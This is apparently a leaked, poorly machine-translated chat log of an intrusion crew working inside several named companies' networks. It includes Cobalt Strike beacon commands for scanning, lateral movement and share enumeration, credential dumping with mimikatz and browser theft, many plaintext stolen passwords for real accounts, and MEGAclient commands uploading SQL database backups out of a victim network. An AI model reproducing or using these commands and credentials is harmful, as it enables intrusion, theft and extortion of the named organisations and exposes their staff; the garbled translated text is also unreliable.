list via dirb``.
[+] 172.31.45.14: - 172.31.45.14:80 - TCP OPEN
[+] 10.99.202.247: - 10.99.202.247:80 - TCP OPEN
[+] 10.99.205.75: - 10.99.205.75:80 - TCP OPEN
[+] 10.99.195.11: - 10.99.195.11:443 - TCP OPEN
[+] 10.99.202.247: - 10.99.202.247:443 - TCP OPEN
[+] 172.31.190.157: - 172.31.190.157:443 - TCP OPEN
[+] 10.99.198.60: - 10.99.198.60:443 - TCP OPEN
[+] 10.99.193.18: - 10.99.193.18:443 - TCP OPEN
[+] 10.99.198.60: - 10.99.198.60:80 - TCP OPEN
[+] 172.31.45.15: - 172.31.45.15:80 - TCP OPEN
[+] 10.99.205.75: - 10.99.205.75:443 - TCP OPEN
[+] 10.99.202.181:        - 10.99.202.181:443 - TCP OPEN
[+] 10.99.201.43: - 10.99.201.43:443 - TCP OPEN
[+] 10.99.193.24: - 10.99.193.24:443 - TCP OPEN
[+] 10.99.193.24: - 10.99.193.24:80 - TCP OPEN
[+] 10.99.201.43: - 10.99.201.43:80 - TCP OPEN
[+] 172.31.45.20: - 172.31.45.20:80 - TCP OPEN
[+] 10.99.193.18: - 10.99.193.18:80 - TCP OPEN
it's not necessary that you just have a direct redirect from the host on the port which under soks can pro brute-force the right way look there are such utilitiesdirb / dirbusThen yes. I understand it is a local hostname or address I did not specify an external domain is on the local I suggest to check not, in amazon 2FA. I check on the local I do not think that climb in amazon worth vobshekak I pinyal, they used to have their citrix - after him left a certain number of servers. Now they're in the cloud on amazon. And it looks like it's not their Citrix, but John Deere's, and it has ldap authorization bolted on to it. I'm looking on their local servers now - maybe there's something left...take all the hosts that open on port 80/443
Run a dirbuster on the format

https://hostname/vpn/index.html
or at
https://ipaddr/vpn/index.html``
https://*domain.com/vpn/index.html
```
here's the default path to the citrix login.
i'm a little confused maybe...but why citrixxpreselect all live servers with a hint of citrix in the name or descriptionwhat i'm trying here i found that it is not login but cgi/loginda. and http and https https added? comp name not necessarily = server name login - also self come here https://....../login so go to the name is about that, the name might show something ... 80 is the same and tcheck 80 and 443 ports can be specified by name or by name it is a separate configuration block access by ipdalfnu htrs. for example nginx if configured - it gives by name, but by ip on 404 blameduethe scheme http(s) why? well, within the domain that just a web server can not give anything when accessing ipsysteminfo, ipconfiglocal - what? and then how can all the local DNS to rent? what is available and local.here's another question - there are Citrix Delivery Controllers, there is Citrix Director is probably something else is. I have what to look for? as an option to prescribe in the hosts domain to the local ip Citrixshekas will trynu yes, just log in that will be by IP - auto redirect will not work443 80the same web admin port) port what citrix? 80????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
beacon> portscan 3.15.36.195 80,443 icmp 2
[*] Tasked beacon to scan ports 80,443 on 3.15.36.195
[+] host called home, sent: 93245 bytes
[+] received output:
Scanner module is complete
``Yeah, ldap is probably connected but I don't think it's part of the domain then 80 and 443`` ``
beacon> shell ping signon.jdisonline.com
[*] Tasked beacon to run: ping signon.jdisonline.com
[+] host called home, sent: 57 bytes
[+] received output:

Pinging ok11-crtr-custom-domains-cd76c2bd4d92725a.elb.us-east-2.amazonaws.com [3.15.36.195] with 32 bytes of data:
Request timed out.
Request timed out.

[+] received output:
Request timed out.

[+] received output:
Request timed out.

Ping statistics for 3.15.36.195:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),

beacon> portscan 3.15.36.195 445,139 icmp 2
[*] Tasked beacon to scan ports 445,139 on 3.15.36.195
[+] host called home, sent: 93245 bytes
[+] received output:
Scanner module is complete
``Can you see ports 445,139 445? ping what? if citrix, amazon. but samaccountname from local domain is set at ping? their servers may be on amazon in some strange place. but it seems they have different settings. two of them ask 2FA at login and one at change of settings here also 2FA.
--- Chromium Credential (User: ndmicjsater) ---
URL : https://jdoapps.jdisonline.com/cgi/login
Username : ndmicjsater
Password : NDleading22

Is it okay if it's their server or not? It looks like they moved the Citrix servers to amazom. is that okay? ok. I'm already looking for a session on the server where you can get at least a hash of the hash of the hash of the hash of the hash of the hash of the hash of the hash. there is a place to find the cred, I think you can find the cred[ ](https://mediaeveryone.com/group/snpartners-com?msg=KBaYd7yCCB8SByp2c) ok, but JDODMP03.jdossn.local resolves into this ip.
>memberOf: CN=NDLEADING_Citrix_Local_Drives,
``Then take down the browsers where you can and look for citrixstrannotut and the usual polzacs no more. and the AD_comp `34648 Objects returned`` external?
UserName : jdodmp_svc
ComputerName : JDODC67.jdossn.local
SessionFrom : 204.54.154.136
SessionFromName : JDODMP03.jdossn.local
LocalAdmin : False
they are not in this subnet and can't see them from here (so go to the DAE PC and take their hash off) practically. on the DAE does not let in all? and not the servers does not let in. on the user PCs the same LA, so you only go to the user PCs? i dont remember, i think i checked. i don't remember. i think i checked it again.
>uSNCreated: 63484
>memberOf: CN=NDLEADING_DPARTS,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_PARTS,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_ALL,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_All_Email,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING SharePoint Admins,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_Citrix_Local_Drives,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_EQUIP_SDK_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_SD_Technicians,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_SD_Schedulers,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_SD_Managers,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_SD_Admins,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_SD_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_EQUIP_Reports_Drive,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING SharePoint,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_EQUIP_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_EQUIPRDB-ALL,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_EQUIPPatch_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_Excel_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_Dealer_Portal_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_Computer_Account_Admins,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_All_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_Password_Reset_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
``Where did you find webroute access not YES? they administer under LA only in kerbaha nowhere YES? yeah dunno. now 10 active. i think i went through all the available pk on the available? and yes, i can not go out of the local network and i can not take the YES? and you have already found the admin? ah, no))) i also have a webrout stoit you already found the admin in the second network? and you have not mixed up the group? no. neighborxox threw from the car polozak where did you take access?
```
--- Chromium Credential (User: ndmicjsater) ---
URL : https://my.webrootanywhere.com/default.aspx
Username : jasons@leadingedgeequip.com
Password : jsateren8726

```
but there is still asking for 2FA confirmation code try through RDPoping. went through smb_login - among those where the crescendos came up, there are 2 servers with open RDP.pinging the list of servers, for the following smb login ``.
beacon> shell wmic /NODE:172.31.190.103 /privileges:enable OS GET Name,OSArchitecture
[*] Tasked beacon to run: wmic /NODE:172.31.190.103 /privileges:enable OS GET Name,OSArchitecture
[+] host called home, sent: 104 bytes
[+] received output:
Node - 172.31.190.103

ERROR:

Description = The RPC server is unavailable.


\remote-exec wmi 172.31.190.103 rundll32 \\172.31.190.103\testvolume\GH-GHNS-DHS_Copy\office365\mui.dll entryPoint\remote-exec all three methodsa run how?[ ](https://mediaeveryone.com/group/snpartners-com?msg=apMHH3c8mKdEeZrMmh) Well on NAS it is not wind most likely )) no, maybe you can put it in the group yes? about failed to start the dll ie? do not change the passwords on the other is just a user. on NAS to start the dll did not work. He has rights to change passwords, as I understand it. Is there any way to use this?[ ](https://mediaeveryone.com/group/snpartners-com?msg=4pFWzF5wGgrJ9usov) and there are no other accesses?
```
Username : nddevbernst
Password : NDleading2021!
``only to custom ones. some to the aggressor whale
could you send me a link to a netlogon that worked and the admin above is nowhere to be found? i need to duplicate it in the confuscha let me duplicate it again, i lost the 445 port results file what kind of pc? all sannets from the adfind on /24 scanned, only 3-4 computers in the game did you look for vg and external backups? in spns is hyper-v replica service on several machines, this is the maximum i saw

0 trusts
37 servers
1205 armies
I think if you pinged, it would be much less than that and how many servers, armies and trusts we have, there iscsi empty
there's ehs, no creed
there are two servers
bgukhoveam there's a tiny bit of .bco-shares
bally44backup there's a lot of backups

nothing else found a la wsphere, hypervisors, etc[ ](https://mediaeveryone.com/channel/general?msg=zbgfwydjaxhwyWEwu) any signs of cloud solutions? let's complicate the process today, let's check the WOL. then write to the group the number of pcs, arms and trustschromium admins, chromium all polozakonea, ran through all computers where admins sat yesterday then today we close, admins surely had no hints of claud or vg on backups?yes[ ](https://mediaeveryone.com/channel/general?msg=WGerCebrheZx2Wd3o) there are all found, what do I need? found one more guy, his credentials do not bring up a session on three computers. i remove the credentials from them via CME[ ](https://mediaeveryone.com/channel/general?msg=TQsXdkctah9AnbJNo) the same thing
There are a couple of subnets left to scan.
so far nothing in bellimore still in search of the creeds from the echyotr write down, what are your results? in preparation for closing in balimorladno, clarified. if you are done with the lab go to the networks[ ](https://mediaeveryone.com/channel/general?msg=HMAxxaonYPKBkydbG) 3 days ago I tried to build a server, at what time do not remember. fuck.... I'm already confused on all sides.or am I misunderstanding? just not setting up and building the server so you were still busy with lab 3 days ago? for lab, should have been but nothing started on it. I put it aside, it's at my desk. Then I brought a different office on it started up and now it's spinning. Do you want me to describe the hardware? [ ](https://mediaeveryone.com/channel/general?msg=5ywWviKNjaaKB8v2B) and this [ ](https://mediaeveryone.com/channel/general?msg=NMJXZRRGGaRR3RnGr) + [ ](https://mediaeveryone.com/channel/general?msg=FvaSSFmTR9MEnhQP6) I already saw it, it's just 16 minutes on the 22nd, counted as three days[ ](https://mediaeveryone.com/channel/general?msg=cxkivPJYBETLt6ffr) pieced together = assembled? What kind of server? 100% Yesterday today I did lab, I can't tell you. Before that I was piecing a server on a Chinese mother that does not fuckin' work! that was three days ago. so yesterday and today? yeah, yesterday. not much sleep. i don't remember what happened three days ago.

I sign up uni yesterday yesterdayrahm, maybe I'm already confused uni it was yesterday ? gave you an individual problem on the vpn like, which then @user7 left, strong strong and so on)you said that the lab I remember the day before yesterday I asked you to work on the net finished about 10 minutes ago. Do not count in hours. I think since yesterday, wrote to you. how much time was busy with this task?
Finished with webmords, doesn't take much off
found:
1 ushi (no creeds)
1 us (no kreds)
iLO 4 ProLiant
iLO 54 ProLiant
the last two things have not figured out what they are, and no Credits
iLO 4 ProLiant 54 ProLiant not yet figured out what they are, well, there are no Credits
main.crispregional.org
```
also looking for hints on the backups in the vg and the cloudswrite at the same time, that on the tasks of all, let's move on to the main tasks thank you tell me that he has 10 minutes to contact the boss promptly call pliz @ot let him answer bosu and here we are all trying to make sense of this situation if not then it turns out that @ot himself checked, none of us have checked so, aware of this kitchen were only @ot and @user3 no) and you sent them to check?what's the problem with the tests? we don't know about it, only @ot does. ask the others about the tests - @ot
tests - I don't know
lab - @ot and @user3
the last one is closed, @user3 was busy configuring it so in order, who did the interviews, tests, labs maybe someone will have problems depending on your answers)okay, never mind, what do you mean by that? and i also talk about tests and labs we talk about the tests and the interviews specifically labs i mean what works with it, from what i observe, @user3 and tests who checked?@ot who conducted the interviews? so? so she rather under the direction of @user3 over which @user3 still works eeetu labaa)ot2 is it who you know about the lab, tests and other things under the direction of @ot? distracted yet? then they immediately 1 dk and picked up the same pdkvot 1 dktakta all ok?
List of DCs in Domain
    \\WDC1 (PDC)
``I did
`shell nltest /dclist`
without `:````
beacon> shell nltest /dclist:
[*] Tasked beacon to run: nltest /dclist:
[+] host called home, sent: 46 bytes
[+] received output:
Get list of DCs in domain '' from '\\WWDC1.waterway.com'.
You don't have access to DsBind to (\\WWDC1.waterway.com) (Trying NetServerEnum).
List of DCs in Domain
    \\WDC1 (PDC)
The command completed successfully

``shell nltest /dclist:````
beacon> shell net accounts
[*] Tasked beacon to run: net accounts
[+] host called home, sent: 43 bytes
[+] received output:
Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 90
Minimum password length: 6
Length of password history maintained: 10
Lockout threshold: 15
Lockout duration (minutes): 5
Lockout observation window (minutes): 5
Computer role: WORKSTATION
The command completed successfully.
``nltest output
beacon> net domain
waterway.com

beacon> net domain_controllers
Domain Controllers:
[-] Error: 0

beacon> shell nltest /dclist:waterway.com
Get list of DCs in domain 'waterway.com' from '\\\WWDC1.waterway.com'.
Cannot DsBind to waterway.com (\\WWDC1.waterway.com).Status = 1722 0x6ba RPC_SERVER_UNAVAILABLE
I_NetGetDCList failed: Status = 6118 0x17e6 ERROR_NO_BROWSER_SERVERS_FOUND

beacon> shell net accounts /dom
The request will be processed at a domain controller for domain waterway.com.
System error 5 has occurred.
Access is denied.

found ESXi, no credits yet
checked all my DA's with sniper - they are sitting on servers, in chrome only one had password without username from unopened snout
Checking of scanned interfaces is in process.
sniper check all sysadmins and i.t. guys in the process I have a couple of sessions in the slipway, the water I have not seen nimble here, hashes are different, but not valid nimble is dead? all empty? not even hashes are different? 6 Computers where he was with the rights pulled and in them for now and stay. la was you did not have YES? hashes gave tl2 so far nothing interesting, other than what I wrote in the conf, did not findKred still not found, run the invey and caught some interesting information - the assumption that previously found seven in the yr and not in the domain looks reasonable, because found several other similar compounds. Scan the subnets to 445 443 22 80. Search the files on the computers where you have access to do not forget the cloud solutions.
main.crispregional.org
```
There is a sphere, av, backups
Looking for backups in the groups in `CORP.TELEVISA.COM.MX` I`ve jumped into `CORPSFECRT04` there is nothing on the creeds, now I'll go further untwisted Write down the status of work to get there. like any creeds fit there, but only as a normal polozaki maybe something like that : //www.zoller.info/en/products/tool-management/storage-systems/keeper) and what the drill can not kill? yeah hz. they sell weapons, and these drills assumption : //www.zoller.info/en/home?r=1```
10.0.0.24 0EA78803 [Win Embedded Standard 7601 SP 1]

Probably because it's some kind of cut-up sevens but you need prufy as a variant - that's the title of the crossover.com looking for crescendos with the rights. While I was looking for found ``.
 (platform: 500 version: 6.1 name: 0EA78803 domain: ZOLLER)
``and now looking for confirmation of a second domain, who works with it? access and other stuff, and looking for external, internal storage, and the quality of the locale itself, we'll give up on that about creating backups
looking for backups, auth, then listings skul, mail, filescredits only no backups found#ballymoregroup-com
check the web muzzles that naskanii naskanii write what are you doing? in another) push @user7 into the confab to see where everyone is at? hello:space_invader:everyone say goodbye until tomorrow it is mandatory items + cloud check backups in vorkgroups tomorrow will close a couple of networks and tomorrow by 6 pm will finalize `benihana.com
starting user is neutered, kerbs are removed, hell is removed, ShareFinder is dropped

`ballymoregroup.com
found 2 nasa, one dead
2 backup servers found, listings made
2 exch of hell not pinging `Ping request could not find host`
pinging whines in the process
LA starter user on several machines. Went everywhere took off browsers, hashdump and mimic. From all of this found two different hashes YES, but apparently old. No Kerbs - writes something like ``[X] No users found to Kerberoast!
``````
main.crispregional.org
```
What's left:
backups to find, optionally AV tomorrow by 4 I think half an hour more, what are we up to today?
```
	main.crispregional.org 10.1.20.213 SYSTEM * PROVATIONTEST
``that's what kind of silent excitermelanu and all and alive so I keeled it a long time ago better spawn it? why should it die in the first place it won't die do a better spawn first do a spawn kill the session will die
psinject 4728 x86 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\found_shares.txt
````CheckShareAccess` ?
ERROR: Invoke-ShareFinder : A parameter cannot be found that matches parameter name 'checkaccess'.
``where is the -checkaccess flag wev beacon> psinject 4540 x64 Invoke-ShareFinder I also wondered if it shows access balls, not just enum balls? ah, it's for that message) yeah, I don't know)) I thought roll call is to whom and where?sccy.com it turns out...no big deal, it turns out? not a wrong password? it says access denied it if you're talking about the sharfinder output there above look it up, access denied
they have a lockout after 5 failed, i think how not to break it with the admin-not yet out of the point?
beacon> shell MEGAclient.exe put -q --ignore-quota-warn F:\SQLBackup\*.bak
[*] Tasked beacon to run: MEGAclient.exe put -q --ignore-quota-warn F:\SQLBackup\*.bak
[+] host called home, sent: 91 bytes
[+] received output:
[API:err: 23:56:12] Unable to open local path: \\?\F:\SQLBackup\*.bak

beacon> shell MEGAclient.exe put -q --ignore-quota-warn \\\wwsql2\F$\SQLBackup\*.bak
[*] Tasked beacon to run: MEGAclient.exe put -q --ignore-quota-warn \\\wwsql2\\F$\SQLBackup\*.bak
[+] host called home, sent: 100 bytes
[+] received output:
[API:err: 23:56:38] Unable to open local path: \\?\\\wwsql2\F$\SQLBackup\*.bak

``Will it work?`` That's what I mean.
MEGAclient.exe put -q --ignore-quota-warn *.bak
No, it's not like all the backups will fit in there without archiving, but in MEGA you can put *hm in the filename
ztclmgplmwfqmcjqfn@wqcefp.com
745jkiJIGSFjer67
```
I'll upload it here.

`QfvqBgx767v14bn6c0JlKw` but you noticed it in general in the intranet they often work by looking at the keywordPDI_backup_2021_01_10_053001_4017258.bak
Intranet_backup_2021_01_10_053001_3704801.bak
ManagementInfo_backup_2021_01_10_053001_3861023.bak
Development_backup_2021_01_10_053001_3392249.bak
Financial_backup_2021_01_10_053001_3548530.bak
2гб28,398,080 CCC_backup_2021_01_10_053001_3079732.bak
28 meters``.
beacon> shell dir F:\SQLBackup
[*] Tasked beacon to run: dir F:\SQLBackup
[+] host called home, sent: 47 bytes
[+] received output:
 Volume in drive F is Data
 Volume Serial Number is 0E12-2B9D

 Directory of F:\SQLBackup

01/10/2021 10:00 PM <DIR> .
01/10/2021 10:00 PM <DIR> .
01/10/2021 05:30 AM 778,129,920 Analysis_backup_2021_01_10_053001_2923480.bak
01/10/2021 05:30 AM 8,176,882,176 Audit_backup_2021_01_10_053001_3079732.bak
01/10/2021 05:30 AM 28,398,080 CCC_backup_2021_01_10_053001_3079732.bak
01/10/2021 05:30 AM 398,543,360 Chemical_backup_2021_01_10_053001_3079732.bak
01/10/2021 05:30 AM 8,999,424 coupons_backup_2021_01_10_053001_3236000.bak
01/10/2021 05:31 AM 81,874,432 damage_backup_2021_01_10_053001_3236000.bak
01/10/2021 05:32 AM 9,034,617,344 datawarehouse_backup_2021_01_10_053001_3392249.bak
01/10/2021 05:31 AM 492,955,136 development_backup_2021_01_10_053001_3392249.bak
01/10/2021 05:34 AM 13,386,831,360 DRB_backup_2021_01_10_053001_3392249.bak
01/10/2021 05:47 AM 125,342,217,728 ElectronicJournals_backup_2021_01_10_053001_3548530.bak
01/10/2021 05:47 AM 1,747,013,120 Financial_backup_2021_01_10_053001_3548530.bak
01/10/2021 05:47 AM 485,575,168 Intranet_backup_2021_01_10_053001_3704801.bak
01/10/2021 05:47 AM 1,256,280,576 Inventory_backup_2021_01_10_053001_3704801.bak
01/10/2021 05:49 AM 12,605,082,112 Labor_backup_2021_01_10_053001_3704801.bak
01/10/2021 05:49 AM 28,398,080 ManagementInfo_backup_2021_01_10_053001_3861023.bak
01/10/2021 05:30 AM 4,024,832 master_backup_2021_01_10_053001_2142238.bak
01/10/2021 05:54 AM 2,821,808,640 Metabase_backup_2021_01_10_053001_4642233.bak
01/10/2021 05:30 AM 2,729,472 model_backup_2021_01_10_053001_2767253.bak
01/10/2021 05:50 AM 3,761,328,640 Morning_backup_2021_01_10_053001_3861023.bak
01/10/2021 05:30 AM 66,149,888 msdb_backup_2021_01_10_053001_2767253.bak
01/10/2021 05:50 AM 2,615,249,408 Payrolll_backup_2021_01_10_053001_3861023.bak
01/10/2021 05:50 AM 3,232,256 PDIPriceBook_backup_2021_01_10_053001_4017258.bak
01/10/2021 05:50 AM 1,482,774,016 PDI_backup_2021_01_10_053001_4017258.bak
01/10/2021 05/2021 05:52 AM 15,148,882,432 PLUHistory_backup_2021_01_10_053001_4173454.bak
01/10/2021 05:52 AM 1,110,528,512 POSInfo_backup_2021_01_10_053001_4173454.bak
01/10/2021 05:30 AM 8,479,232 ReportServerTempDB_backup_2021_01_10_053001_2923480.bak
01/10/2021 05:30 AM 118,684,160 ReportServer_backup_2021_01_10_053001_2767253.bak
01/10/2021 05:52 AM 3,430,912 Scorecard_Settings_backup_2021_01_10_053001_4173454.bak
01/10/2021 05:53 AM 1,074,877,952 Shared_backup_2021_01_10_053001_4329699.bak
01/10/2021 05:53 AM 11,357,211,136 specialty_backup_2021_01_10_053001_4329699.bak
01/10/2021 05:53 AM 705,843,712 SQI_backup_2021_01_10_053001_4329699.bak
01/10/2021 05:53 AM 2,021,739,008 Swipe_backup_2021_01_10_053001_4485967.bak
01/10/2021 05:54 AM 24,244,736 Test_backup_2021_01_10_053001_4642233.bak
01/10/2021 05:53 AM 242,305,536 Tips_backup_2021_01_10_053001_4485967.bak
01/10/2021 05:53 AM 4,738,560 WWBackOffice_backup_2021_01_10_053001_4642233.bak
              35 File(s) 216,430,061,056 bytes
               2 Dir(s) 787,610,132,480 bytes free
``Then pick one of your choice from the list above. Won`t you get burnt again? I`d take them.
WWSQL.waterway.com
CCC 15549
CCCDenver 10




WWSQL2.waterway.com
name
-------------------------------------------------------------------------------------------------------------------------------- -----------
Analysis 824
datawarehouse 12105
development 620
DRB 24028
Financial 1676
Payroll 2633
POSInfo 1272



PDIPRODSQL.waterway.com
name
-------------------------------------------------------------------------------------------------------------------------------- -----------
PDICompany_1137_01 43320

``[ ](https://mediaeveryone.com/group/waterway-com?msg=h52pqMWzd3NZ66geo) these backups, what databases to unload? ladies, what are we talking about? with databases@tl1 and what is the resultFinancial
Development[ ](https://mediaeveryone.com/group/waterway-com?msg=JGmFk2598zma3v55v) these are interesting. Which ones to export and upload?
there are no listings backupagatak there's even a prefix old, they were rubbed and that's it, why are we stopping at it as much as I have encountered, there's an anchorable until you find a subnet in which the loss > 0% there also an anchorable from other subnets pinged not, it means not pinged it rather 100% loss than anchorahahahaha it's like @user7 had 40 servers on hell, but alive 70[ ](https://mediaeveryonecom/group/waterway-com?msg=9euTBxfTrFDYCn8s4) is like 15 out of 10[ ](http://mediaeveryone.com:3000/group/waterway-com?msg=favdnjaS7YHBZPuvT) I did
shell netstat -abn and look on what port processes sqlservr, sqlwriter are running on and there's just no pings for me over 100% lossd well here are two that aren't pinged just with the prefix old
and the other two with closed ports `Destination host unreachable.
Teemo[WWDC2]SYSTEM */628|2021Jan15 02:00:34> shell ping WWSQLOLD -n 1
[*] Tasked beacon to run: ping WWSQLOLD -n 1
[+] host called home, sent: 49 bytes
[+] received output:

Pinging WWSQLOLD.waterway.com [192.168.0.37] with 32 bytes of data:
Reply from 192.168.0.222: Destination host unreachable.

Ping statistics for 192.168.0.37:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),

Teemo[WWDC2]SYSTEM */628|2021Jan15 02:01:03> shell ping WWSQL2Old -n 1
[*] Tasked beacon to run: ping WWSQL2Old -n 1
[+] host called home, sent: 50 bytes
[+] received output:

Pinging WWSQL2Old.waterway.com [192.168.0.83] with 32 bytes of data:
Reply from 192.168.0.222: Destination host unreachable.

Ping statistics for 192.168.0.83:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),

``````
Teemo[WWDC2]SYSTEM */628|2021Jan15 01:59:00> shell ping PDITESTSQL -n 1
[*] Tasked beacon to run: ping PDITESTSQL -n 1
[+] host called home, sent: 51 bytes
[+] received output:

Pinging PDITESTSQL.waterway.com [192.168.0.127] with 32 bytes of data:
Reply from 192.168.0.127: bytes=32 time=1ms TTL=128

Ping statistics for 192.168.0.127:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 1ms, Maximum = 1ms, Average = 1ms

Teemo[WWDC2]SYSTEM */628|2021Jan15 01:59:21> shell ping wwsql02 -n 1
[*] Tasked beacon to run: ping wwsql02 -n 1
[+] host called home, sent: 48 bytes
[+] received output:

Pinging wwsql02.waterway.com [192.168.0.59] with 32 bytes of data:
Reply from 192.168.0.59: bytes=32 time<1ms TTL=64

Ping statistics for 192.168.0.59:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

are they not pinging? haven't you tried those from other segments?
or those ports are closed?) and on these and do not get in without smb and rdps other network segments? yes, i.e. the servers can not go to? @user8 how to find a skull server two off
and two (PDITESTSQL,wwsql02) do not see anything, no ports 1433,445,3389,139
WWSQL.waterway.com
name
-------------------------------------------------------------------------------------------------------------------------------- -----------
AppSettings 14
AuthorizeNet 3736
CCC 15549
CCCDenver 10
Donations 30
Fundraising 14
GravityForms 903
HotSchedules 39
LocalMarketing 12
Loyalty 201
Silverpop 2993
Timeclock 9298
WooCommerce 104

(13 rows affected)



WWSQL2.waterway.com
name
-------------------------------------------------------------------------------------------------------------------------------- -----------
Analysis 824
Audit 10825
CCC 29
Chemical 444
coupons 10
damage 87
datawarehouse 12105
Development 620
DRB 24028
ElectronicJournals 150418
Financial 1676
Intranet 3627
Inventory 1331
Labor 13508
ManagementInfo 30
Metabase 2708
Morning 4934
Payroll 2633
PDI 1522
PDIPriceBook 4
PLUHistory 15546
POSInfo 1272
ReportServer 31096
ReportServerTempDB 992
Scorecard_Settings 4
Shared 1084
Specialty 14329
SQI 1554
Swipe 5506
Test 453
Tips 263
WWBackOffice 6

(32 rows affected)



PDIPRODSQL.waterway.com
name
-------------------------------------------------------------------------------------------------------------------------------- -----------
PDI_Stage_1137_01 3130
PDI_Warehouse_1137_01 6829
PDICompany_1137_01 43320
PDICompany_1137_01_FRx 5
PDICompany_1137_91 34633
PDICompany_1137_91_FRx 4
PDICompany_1137_92 42048
PDICompany_1137_92_FRx 4
PDICompany_1137_93 35983
PDICompany_1137_93_FRx 4
PDICompany_1137_94 37376
PDICompany_1137_94_FRx 4
PDIFoundation_1137 82096
PDIMaster 238
ReportServer 37613
ReportServerTempDB 174

(16 rows affected)

``````
    WATERWAY\djarden MyNewPassword6
    WATERWAY\Quser pdiC1137qu!
    WATERWAY\Administrator 1853Gators
    WATERWAY\datavault Waterway727
    WATERWAY\domainrestore Waterway727
    WATERWAY\mapusatera Gators1853
    WATERWAY\veeam_admin 99Waterway
    WATERWAY\Applied Waterway99
    WATERWAY\DBunte Waterway99
    WATERWAY\gkeller Waterway76
    WATERWAY\SEnglert Waterway99!
    WATERWAY\blauer 11915Admin2179!
    WATERWAY\mharper LoveUnit14
``@user3@user9
```
WWSQL.waterway.com
WWSQL2.waterway.com
WWSQLOLD.waterway.com
WWSQL2Old.waterway.com
WWsql02.waterway.com
PDIPRODSQL.waterway.com
PDITESTSQL.waterway.com
``would like + listings where? take away there is a pst that is 1.png and a 6 gig pst of some itishpost still
a couple of pumped out all you got ready? ok, i'll yank the cc_data.mdf it would be nice to pick up their backups? what's not ready? hello):space_invader:dayyou're all set for tomorrow's slip and everything as usual by 11pm see everything else, mine is no longer fit for me? hello, everyone, hello
dn:CN=PANAVISION,CN=System,DC=panavision,DC=com
>whenCreated:2005/09/14-17:51:44 Mountain Daylight Time
>name: PANAVISION
>securityIdentifier: S-1-5-21-202912000-196093339-1136263860
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: PANAVISION
>trustType: 1 [Downlevel(1)
>trustAttributes: 4 [Quarantined-Domain(4)]
``a bh withdrew.``
fuck
i don't know...suddenly my lock aca was heard imperesnimu traststranimu how i then removed bhvisibly ldap queries are forbidden...weird
it should work
Using server: AUS-DCON-01.ap.panavision.com:3268
Directory: Windows Server 2012 R2

dn:CN=panavision.com,CN=System,DC=ap,DC=panavision,DC=com
>whenCreated: 2006/01/16-15:54:35 Pacific Daylight Time
>name: panavision.com
>securityIdentifier: S-1-5-21-4133310860-2374335328-2948649967
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: panavision.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=panavision.com,CN=System,DC=eu,DC=panavision,DC=com
>whenCreated: 2006/03/02-04:37:35 Pacific Daylight Time
>name: panavision.com
>securityIdentifier: S-1-5-21-4133310860-2374335328-2948649967
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: panavision.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=panavision.com,CN=System,DC=na,DC=panavision,DC=com
>whenCreated: 2005/09/14-16:50:01 Pacific Daylight Time
>name: panavision.com
>securityIdentifier: S-1-5-21-4133310860-2374335328-2948649967
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: panavision.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=PANAVISION,CN=System,DC=panavision,DC=com
>whenCreated: 2005/09/14-16:51:44 Pacific Daylight Time
>name: PANAVISION
>securityIdentifier: S-1-5-21-202912000-196093339-1136263860
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: PANAVISION
